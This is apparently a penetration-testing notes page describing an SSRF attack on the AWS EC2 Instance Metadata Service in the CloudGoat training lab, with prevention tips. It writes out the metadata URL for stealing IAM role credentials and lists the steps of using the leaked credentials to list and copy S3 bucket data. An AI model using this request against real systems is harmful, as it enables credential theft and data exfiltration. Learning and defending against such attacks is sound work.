Edit

👨‍🔬Exploiting AWS Misconfigurations

Basic AWS Services

  • VPC - Virtual Private Cloud

    • Logical Data Center in AWS

  • EC2 - Elasitic Cloud Compute

    • Runs instances that are similar to VMs

  • S3 - Simple Storage Solution

    • Object storage organized into Buckets

  • IAM - Identify Access Management

    • How AWS provisions access

The Problem

The problem exists with an AWS EC2 "feature" called Instance Metadata and an attack known as a Server Side Request Forgery (SSRF).

Tool

LogoGitHub - RhinoSecurityLabs/cloudgoat: CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment toolGitHub

Setup

  • Nginx running on AWS EC2

  • S3 Buckets with sensitive data

  • IAM Roles with read access to S3 buckets

  • Instance Profile with IAM Roles attached to EC2 instance

Misconfiguration

The proxy server should be allowed to retrieve information from the web application server and nothing else.

The attack

  • Discover the Proxy Server that allows access to the Instance Metadata service

  • Craft a request against the web server that can return data from Instance Metadata Service

  • http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role

  • This returns temporary credentails that can be used to access resources allowed by the IAM role

Get Meta-Data

View the directories

View the meta-data directory

View the iam directory

View the buckets using leaked creds

List bucket objetcts

Get Encryption details

Sync the bucket objects into the laptop

Prevention

  • Use least privilege when creating IAM Roles

  • If you do not need the Instance Metadata API (you don't) then firewall it

  • Do not store sensitive data in your provisioning scripts because these can also be read by the Instance Metadata API

PreviousAttacks & MethodologyNextAWS Pentest Methodology

Last updated

Was this helpful?